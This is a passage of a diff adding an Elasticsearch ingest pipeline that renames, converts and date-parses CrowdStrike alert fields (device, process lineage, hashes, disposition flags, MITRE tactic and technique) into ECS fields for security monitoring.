error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} 
with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - append: + field: host.mac + value: '{{{crowdstrike.alert.device.mac_address}}}' + tag: append_device_mac_address_into_host_mac + allow_duplicates: false + if: ctx.crowdstrike?.alert?.device?.mac_address != null + - rename: + field: json.device.machine_domain + tag: rename_device_machine_domain + target_field: crowdstrike.alert.device.machine_domain + ignore_missing: true + - append: + field: related.hosts + value: '{{{crowdstrike.alert.device.machine_domain}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.device?.machine_domain != null + - rename: + field: json.device.major_version + tag: rename_device_major_version + target_field: crowdstrike.alert.device.major_version + ignore_missing: true + - rename: + field: json.device.minor_version + tag: rename_device_minor_version + target_field: crowdstrike.alert.device.minor_version + ignore_missing: true + - date: + field: json.device.modified_timestamp + tag: date_device_modified_timestamp + target_field: crowdstrike.alert.device.modified_timestamp + formats: + - ISO8601 + if: ctx.json?.device?.modified_timestamp != null && ctx.json.device.modified_timestamp != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.device.os_version + tag: rename_device_os_version + target_field: crowdstrike.alert.device.os_version + ignore_missing: true + - set: + field: host.os.full + tag: set_host_os_full_from_alert_device_os_version + copy_from: crowdstrike.alert.device.os_version + ignore_empty_value: true + - rename: + field: json.device.ou + tag: rename_device_ou + target_field: crowdstrike.alert.device.ou + ignore_missing: true + - rename: 
+ field: json.device.platform_id + tag: rename_device_platform_id + target_field: crowdstrike.alert.device.platform_id + ignore_missing: true + - rename: + field: json.device.platform_name + tag: rename_device_platform_name + target_field: crowdstrike.alert.device.platform_name + ignore_missing: true + - set: + field: host.os.platform + tag: set_host_os_platform_from_alert_device_platform_name + copy_from: crowdstrike.alert.device.platform_name + ignore_empty_value: true + - rename: + field: json.device.pod_labels + tag: rename_device_pod_labels + target_field: crowdstrike.alert.device.pod_labels + ignore_missing: true + - rename: + field: json.device.product_type + tag: rename_device_product_type + target_field: crowdstrike.alert.device.product_type + ignore_missing: true + - rename: + field: json.device.product_type_desc + tag: rename_device_product_type_desc + target_field: crowdstrike.alert.device.product_type_desc + ignore_missing: true + - rename: + field: json.device.site_name + tag: rename_device_site_name + target_field: crowdstrike.alert.device.site_name + ignore_missing: true + - rename: + field: json.device.status + tag: rename_device_status + target_field: crowdstrike.alert.device.status + ignore_missing: true + - rename: + field: json.device.system_manufacturer + tag: rename_device_system_manufacturer + target_field: crowdstrike.alert.device.system_manufacturer + ignore_missing: true + - rename: + field: json.device.system_product_name + tag: rename_device_system_product_name + target_field: crowdstrike.alert.device.system_product_name + ignore_missing: true + - rename: + field: json.falcon_host_link + tag: rename_falcon_host_link + target_field: crowdstrike.alert.falcon_host_link + ignore_missing: true + - rename: + field: json.filename + tag: rename_filename + target_field: crowdstrike.alert.filename + ignore_missing: true + - set: + field: file.name + tag: set_file_name_from_alert_filename + copy_from: crowdstrike.alert.filename + 
ignore_empty_value: true + - rename: + field: json.filepath + tag: rename_filepath + target_field: crowdstrike.alert.filepath + ignore_missing: true + - set: + field: file.path + tag: set_file_path_from_alert_filepath + copy_from: crowdstrike.alert.filepath + ignore_empty_value: true + - rename: + field: json.grandparent_details.cmdline + tag: rename_grandparent_details_cmdline + target_field: crowdstrike.alert.grandparent_details.cmdline + ignore_missing: true + - rename: + field: json.grandparent_details.filename + tag: rename_grandparent_details_filename + target_field: crowdstrike.alert.grandparent_details.filename + ignore_missing: true + - rename: + field: json.grandparent_details.filepath + tag: rename_grandparent_details_filepath + target_field: crowdstrike.alert.grandparent_details.filepath + ignore_missing: true + - rename: + field: json.grandparent_details.local_process_id + tag: rename_grandparent_details_local_process_id + target_field: crowdstrike.alert.grandparent_details.local_process_id + ignore_missing: true + - rename: + field: json.grandparent_details.md5 + tag: rename_grandparent_details_md5 + target_field: crowdstrike.alert.grandparent_details.md5 + ignore_missing: true + - append: + field: related.hash + value: '{{{crowdstrike.alert.grandparent_details.md5}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.grandparent_details?.md5 != null + - rename: + field: json.grandparent_details.process_graph_id + tag: rename_grandparent_details_process_graph_id + target_field: crowdstrike.alert.grandparent_details.process_graph_id + ignore_missing: true + - rename: + field: json.grandparent_details.process_id + tag: rename_grandparent_details_process_id + target_field: crowdstrike.alert.grandparent_details.process_id + ignore_missing: true + - rename: + field: json.grandparent_details.sha256 + tag: rename_grandparent_details_sha256 + target_field: crowdstrike.alert.grandparent_details.sha256 + ignore_missing: true + - append: + field: 
related.hash + value: '{{{crowdstrike.alert.parent_details.sha256}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.parent_details?.sha256 != null + - date: + field: json.grandparent_details.timestamp + tag: date_grandparent_details_timestamp + target_field: crowdstrike.alert.grandparent_details.timestamp + formats: + - ISO8601 + if: ctx.json?.grandparent_details?.timestamp != null && ctx.json.grandparent_details.timestamp != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.grandparent_details.user_graph_id + tag: rename_grandparent_details_user_graph_id + target_field: crowdstrike.alert.grandparent_details.user_graph_id + ignore_missing: true + - append: + field: related.user + tag: append_user_graph_id_into_related_user + value: '{{{crowdstrike.alert.grandparent_details.user_graph_id}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.grandparent_details?.user_graph_id != null + - rename: + field: json.grandparent_details.user_id + tag: rename_grandparent_details_user_id + target_field: crowdstrike.alert.grandparent_details.user_id + ignore_missing: true + - append: + field: related.user + tag: append_grandparent_details_user_id_into_related_user + value: '{{{crowdstrike.alert.grandparent_details.user_id}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.grandparent_details?.user_id != null + - rename: + field: json.grandparent_details.user_name + tag: rename_grandparent_details_user_name + target_field: crowdstrike.alert.grandparent_details.user_name + ignore_missing: true + - append: + field: related.user + tag: append_grandparent_details_user_name_into_related_user + value: '{{{crowdstrike.alert.grandparent_details.user_name}}}' + allow_duplicates: false + if: 
ctx.crowdstrike?.alert?.grandparent_details?.user_name != null + - convert: + field: json.has_script_or_module_ioc + tag: convert_has_script_or_module_ioc_to_boolean + target_field: crowdstrike.alert.has_script_or_module_ioc + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.id + tag: rename_id + target_field: crowdstrike.alert.id + ignore_missing: true + - set: + field: event.id + tag: set_event_id_from_alert_id + copy_from: crowdstrike.alert.id + ignore_empty_value: true + - rename: + field: json.indicator_id + tag: rename_indicator_id + target_field: crowdstrike.alert.indicator_id + ignore_missing: true + - rename: + field: json.ioc_context + tag: rename_ioc_context + target_field: crowdstrike.alert.ioc_context + ignore_missing: true + - foreach: + field: crowdstrike.alert.ioc_context + if: ctx.crowdstrike?.alert?.ioc_context instanceof List + ignore_failure: true + processor: + append: + field: related.hash + value: '{{{_ingest._value.md5}}}' + allow_duplicates: false + - foreach: + field: crowdstrike.alert.ioc_context + if: ctx.crowdstrike?.alert?.ioc_context instanceof List + ignore_failure: true + processor: + append: + field: related.hash + value: '{{{_ingest._value.sha256}}}' + allow_duplicates: false + - rename: + field: json.ioc_values + tag: rename_ioc_values + target_field: crowdstrike.alert.ioc_values + ignore_missing: true + - convert: + field: json.is_synthetic_quarantine_disposition + tag: convert_is_synthetic_quarantine_disposition_to_boolean + target_field: crowdstrike.alert.is_synthetic_quarantine_disposition + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag 
{{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.local_process_id + tag: rename_local_process_id + target_field: crowdstrike.alert.local_process_id + ignore_missing: true + - rename: + field: json.logon_domain + tag: rename_logon_domain + target_field: crowdstrike.alert.logon_domain + ignore_missing: true + - rename: + field: json.md5 + tag: rename_md5 + target_field: crowdstrike.alert.md5 + ignore_missing: true + - append: + field: related.hash + value: '{{{crowdstrike.alert.md5}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.md5 != null + - rename: + field: json.name + tag: rename_name + target_field: crowdstrike.alert.name + ignore_missing: true + - rename: + field: json.objective + tag: rename_objective + target_field: crowdstrike.alert.objective + ignore_missing: true + - rename: + field: json.parent_details.cmdline + tag: rename_parent_details_cmdline + target_field: crowdstrike.alert.parent_details.cmdline + ignore_missing: true + - set: + field: process.parent.command_line + tag: set_process_parent_command_line_from_alert_parent_details_cmdline + copy_from: crowdstrike.alert.parent_details.cmdline + ignore_empty_value: true + - rename: + field: json.parent_details.filename + tag: rename_parent_details_filename + target_field: crowdstrike.alert.parent_details.filename + ignore_missing: true + - rename: + field: json.parent_details.filepath + tag: rename_parent_details_filepath + target_field: crowdstrike.alert.parent_details.filepath + ignore_missing: true + - rename: + field: json.parent_details.local_process_id + tag: rename_parent_details_local_process_id + target_field: crowdstrike.alert.parent_details.local_process_id + ignore_missing: true + - rename: + field: json.parent_details.md5 + tag: rename_parent_details_md5 + target_field: crowdstrike.alert.parent_details.md5 + ignore_missing: true + - append: + field: related.hash + 
value: '{{{crowdstrike.alert.parent_details.md5}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.parent_details?.md5 != null + - set: + field: process.parent.hash.md5 + tag: set_process_parent_hash_md5_from_alert_parent_details_md5 + copy_from: crowdstrike.alert.parent_details.md5 + ignore_empty_value: true + - rename: + field: json.parent_details.process_graph_id + tag: rename_parent_details_process_graph_id + target_field: crowdstrike.alert.parent_details.process_graph_id + ignore_missing: true + - rename: + field: json.parent_details.process_id + tag: rename_parent_details_process_id + target_field: crowdstrike.alert.parent_details.process_id + ignore_missing: true + - rename: + field: json.parent_details.sha256 + tag: rename_parent_details_sha256 + target_field: crowdstrike.alert.parent_details.sha256 + ignore_missing: true + - set: + field: process.parent.hash.sha256 + tag: set_process_parent_hash_sha256_from_alert_parent_details_sha256 + copy_from: crowdstrike.alert.parent_details.sha256 + ignore_empty_value: true + - append: + field: related.hash + value: '{{{crowdstrike.alert.parent_details.sha256}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.parent_details?.sha256 != null + - date: + field: json.parent_details.timestamp + tag: date_parent_details_timestamp + target_field: crowdstrike.alert.parent_details.timestamp + formats: + - ISO8601 + if: ctx.json?.parent_details?.timestamp != null && ctx.json.parent_details.timestamp != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.parent_details.user_graph_id + tag: rename_parent_details_user_graph_id + target_field: crowdstrike.alert.parent_details.user_graph_id + ignore_missing: true + - append: + field: related.user + tag: 
append_parent_details_user_graph_id_into_related_user + value: '{{{crowdstrike.alert.parent_details.user_graph_id}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.parent_details?.user_graph_id != null + - rename: + field: json.parent_details.user_id + tag: rename_parent_details_user_id + target_field: crowdstrike.alert.parent_details.user_id + ignore_missing: true + - set: + field: process.user.id + tag: set_process_user_id_from_alert_parent_details_user_id + copy_from: crowdstrike.alert.parent_details.user_id + ignore_empty_value: true + - rename: + field: json.parent_details.user_name + tag: rename_parent_details_user_name + target_field: crowdstrike.alert.parent_details.user_name + ignore_missing: true + - set: + field: process.user.name + tag: set_process_user_name_from_alert_parent_details_user_name + copy_from: crowdstrike.alert.parent_details.user_name + ignore_empty_value: true + - append: + field: related.user + tag: append_parent_details_user_id_into_related_user + value: '{{{crowdstrike.alert.parent_details.user_id}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.parent_details?.user_id != null + - append: + field: related.user + tag: append_parent_details_user_name_into_related_user + value: '{{{crowdstrike.alert.parent_details.user_name}}}' + allow_duplicates: false + if: ctx.crowdstrike?.alert?.parent_details?.user_name != null + - rename: + field: json.parent_process_id + tag: rename_parent_process_id + target_field: crowdstrike.alert.parent_process_id + ignore_missing: true + - convert: + field: crowdstrike.alert.parent_process_id + tag: convert_alert_parent_process_id + target_field: process.parent.pid + type: long + ignore_missing: true + if: ctx.crowdstrike?.alert?.parent_process_id != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: 
{{{_ingest.on_failure_message}}}' + - convert: + field: json.pattern_disposition + tag: convert_pattern_disposition_to_long + target_field: crowdstrike.alert.pattern_disposition + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.pattern_disposition_description + tag: rename_pattern_disposition_description + target_field: crowdstrike.alert.pattern_disposition_description + ignore_missing: true + - convert: + field: json.pattern_disposition_details.blocking_unsupported_or_disabled + tag: convert_pattern_disposition_details_blocking_unsupported_or_disabled_to_boolean + target_field: crowdstrike.alert.pattern_disposition_details.blocking_unsupported_or_disabled + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.pattern_disposition_details.bootup_safeguard_enabled + tag: convert_pattern_disposition_details_bootup_safeguard_enabled_to_boolean + target_field: crowdstrike.alert.pattern_disposition_details.bootup_safeguard_enabled + type: boolean + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.pattern_disposition_details.critical_process_disabled + tag: convert_pattern_disposition_details_critical_process_disabled_to_boolean + target_field: 
crowdstrike.alert.pattern_disposition_details.critical_process_disabled
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.pattern_disposition_details.detect
+ tag: convert_pattern_disposition_details_detect_to_boolean
+ target_field: crowdstrike.alert.pattern_disposition_details.detect
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.pattern_disposition_details.fs_operation_blocked
+ tag: convert_pattern_disposition_details_fs_operation_blocked_to_boolean
+ target_field: crowdstrike.alert.pattern_disposition_details.fs_operation_blocked
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.pattern_disposition_details.handle_operation_downgraded
+ tag: convert_pattern_disposition_details_handle_operation_downgraded_to_boolean
+ target_field: crowdstrike.alert.pattern_disposition_details.handle_operation_downgraded
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - convert:
+ field:
json.pattern_disposition_details.inddet_mask
+ tag: convert_pattern_disposition_details_inddet_mask_to_boolean
+ target_field: crowdstrike.alert.pattern_disposition_details.inddet_mask
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.pattern_disposition_details.indicator
+ tag: convert_pattern_disposition_details_indicator_to_boolean
+ target_field: crowdstrike.alert.pattern_disposition_details.indicator
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.pattern_disposition_details.kill_action_failed
+ tag: convert_pattern_disposition_details_kill_action_failed_to_boolean
+ target_field: crowdstrike.alert.pattern_disposition_details.kill_action_failed
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.pattern_disposition_details.kill_parent
+ tag: convert_pattern_disposition_details_kill_parent_to_boolean
+ target_field: crowdstrike.alert.pattern_disposition_details.kill_parent
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message:
{{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.pattern_disposition_details.kill_process
+ tag: convert_pattern_disposition_details_kill_process_to_boolean
+ target_field: crowdstrike.alert.pattern_disposition_details.kill_process
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.pattern_disposition_details.kill_subprocess
+ tag: convert_pattern_disposition_details_kill_subprocess_to_boolean
+ target_field: crowdstrike.alert.pattern_disposition_details.kill_subprocess
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.pattern_disposition_details.operation_blocked
+ tag: convert_pattern_disposition_details_operation_blocked_to_boolean
+ target_field: crowdstrike.alert.pattern_disposition_details.operation_blocked
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.pattern_disposition_details.policy_disabled
+ tag: convert_pattern_disposition_details_policy_disabled_to_boolean
+ target_field: crowdstrike.alert.pattern_disposition_details.policy_disabled
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in
pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.pattern_disposition_details.process_blocked
+ tag: convert_pattern_disposition_details_process_blocked_to_boolean
+ target_field: crowdstrike.alert.pattern_disposition_details.process_blocked
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.pattern_disposition_details.quarantine_file
+ tag: convert_pattern_disposition_details_quarantine_file_to_boolean
+ target_field: crowdstrike.alert.pattern_disposition_details.quarantine_file
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.pattern_disposition_details.quarantine_machine
+ tag: convert_pattern_disposition_details_quarantine_machine_to_boolean
+ target_field: crowdstrike.alert.pattern_disposition_details.quarantine_machine
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.pattern_disposition_details.registry_operation_blocked
+ tag: convert_pattern_disposition_details_registry_operation_blocked_to_boolean
+ target_field: crowdstrike.alert.pattern_disposition_details.registry_operation_blocked
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+
value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.pattern_disposition_details.rooting
+ tag: convert_pattern_disposition_details_rooting_to_boolean
+ target_field: crowdstrike.alert.pattern_disposition_details.rooting
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.pattern_disposition_details.sensor_only
+ tag: convert_pattern_disposition_details_sensor_only_to_boolean
+ target_field: crowdstrike.alert.pattern_disposition_details.sensor_only
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.pattern_disposition_details.suspend_parent
+ tag: convert_pattern_disposition_details_suspend_parent_to_boolean
+ target_field: crowdstrike.alert.pattern_disposition_details.suspend_parent
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.pattern_disposition_details.suspend_process
+ tag: convert_pattern_disposition_details_suspend_process_to_boolean
+ target_field: crowdstrike.alert.pattern_disposition_details.suspend_process
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.pattern_id
+ tag: convert_pattern_id_to_string
+ target_field: crowdstrike.alert.pattern_id
+ type: string
+ ignore_missing: true
+ - rename:
+ field: json.platform
+ tag: rename_platform
+ target_field: crowdstrike.alert.platform
+ ignore_missing: true
+ - rename:
+ field: json.poly_id
+ tag: rename_poly_id
+ target_field: crowdstrike.alert.poly_id
+ ignore_missing: true
+ - date:
+ field: json.process_end_time
+ tag: date_process_end_time
+ target_field: crowdstrike.alert.process_end_time
+ formats:
+ - ISO8601
+ - UNIX
+ if: ctx.json?.process_end_time != null && ctx.json.process_end_time != ''
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - set:
+ field: process.end
+ tag: set_process_end
+ copy_from: crowdstrike.alert.process_end_time
+ ignore_empty_value: true
+ - rename:
+ field: json.process_id
+ tag: rename_process_id
+ target_field: crowdstrike.alert.process_id
+ ignore_missing: true
+ - convert:
+ field: crowdstrike.alert.process_id
+ tag: convert_alert_process_id_to_long
+ target_field: process.pid
+ type: long
+ ignore_missing: true
+ if: ctx.crowdstrike?.alert?.process_id != ''
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - date:
+ field: json.process_start_time
+ tag: date_process_start_time
+ target_field: crowdstrike.alert.process_start_time
+ formats:
+ - ISO8601
+ - UNIX
+
if: ctx.json?.process_start_time != null && ctx.json.process_start_time != ''
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - set:
+ field: process.start
+ tag: set_process_start
+ copy_from: crowdstrike.alert.process_start_time
+ ignore_empty_value: true
+ - rename:
+ field: json.product
+ tag: rename_product
+ target_field: crowdstrike.alert.product
+ ignore_missing: true
+ - rename:
+ field: json.quarantined_files
+ tag: rename_quarantined_files
+ target_field: crowdstrike.alert.quarantined_files
+ ignore_missing: true
+ - foreach:
+ field: crowdstrike.alert.quarantined_files
+ if: ctx.crowdstrike?.alert?.quarantined_files instanceof List
+ ignore_failure: true
+ processor:
+ append:
+ field: related.hash
+ value: '{{{_ingest._value.sha256}}}'
+ allow_duplicates: false
+ - rename:
+ field: json.scenario
+ tag: rename_scenario
+ target_field: crowdstrike.alert.scenario
+ ignore_missing: true
+ - convert:
+ field: json.severity
+ tag: convert_severity_to_long
+ target_field: crowdstrike.alert.severity
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - set:
+ field: event.severity
+ tag: set_event_severity_from_alert_severity
+ copy_from: crowdstrike.alert.severity
+ ignore_empty_value: true
+ - rename:
+ field: json.sha1
+ tag: rename_sha1
+ target_field: crowdstrike.alert.sha1
+ ignore_missing: true
+ - rename:
+ field: json.sha256
+ tag: rename_sha256
+ target_field: crowdstrike.alert.sha256
+ ignore_missing: true
+ - append:
+ field: related.hash
+ value: '{{{crowdstrike.alert.sha1}}}'
+ allow_duplicates:
false
+ if: ctx.crowdstrike?.alert?.sha1 != null
+ - append:
+ field: related.hash
+ value: '{{{crowdstrike.alert.sha256}}}'
+ allow_duplicates: false
+ if: ctx.crowdstrike?.alert?.sha256 != null
+ - convert:
+ field: json.show_in_ui
+ tag: convert_show_in_ui_to_boolean
+ target_field: crowdstrike.alert.show_in_ui
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - rename:
+ field: json.source_products
+ tag: rename_source_products
+ target_field: crowdstrike.alert.source_products
+ ignore_missing: true
+ - rename:
+ field: json.source_vendors
+ tag: rename_source_vendors
+ target_field: crowdstrike.alert.source_vendors
+ ignore_missing: true
+ - rename:
+ field: json.status
+ tag: rename_status
+ target_field: crowdstrike.alert.status
+ ignore_missing: true
+ - rename:
+ field: json.tactic
+ tag: rename_tactic
+ target_field: crowdstrike.alert.tactic
+ ignore_missing: true
+ - append:
+ field: threat.tactic.name
+ tag: append_threat_tactic_name
+ value: '{{{crowdstrike.alert.tactic}}}'
+ allow_duplicates: false
+ if: ctx.crowdstrike?.alert?.tactic != null
+ - rename:
+ field: json.tactic_id
+ tag: rename_tactic_id
+ target_field: crowdstrike.alert.tactic_id
+ ignore_missing: true
+ - script:
+ lang: painless
+ tag: script_to_set_threat_tactic_id
+ if: ctx.crowdstrike?.alert?.tactic_id != null
+ description: Script to set threat tactic ID.
+ source: |
+ def v = ctx.crowdstrike.alert.tactic_id;
+ if (v.startsWith("CS")) {
+ v = v.substring(2, v.length());
+ }
+ ctx.threat.tactic.id = [v];
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - rename:
+ field: json.technique
+ tag: rename_technique
+ target_field: crowdstrike.alert.technique
+ ignore_missing: true
+ - append:
+ field: threat.technique.name
+ tag: append_threat_technique_name
+ value: '{{{crowdstrike.alert.technique}}}'
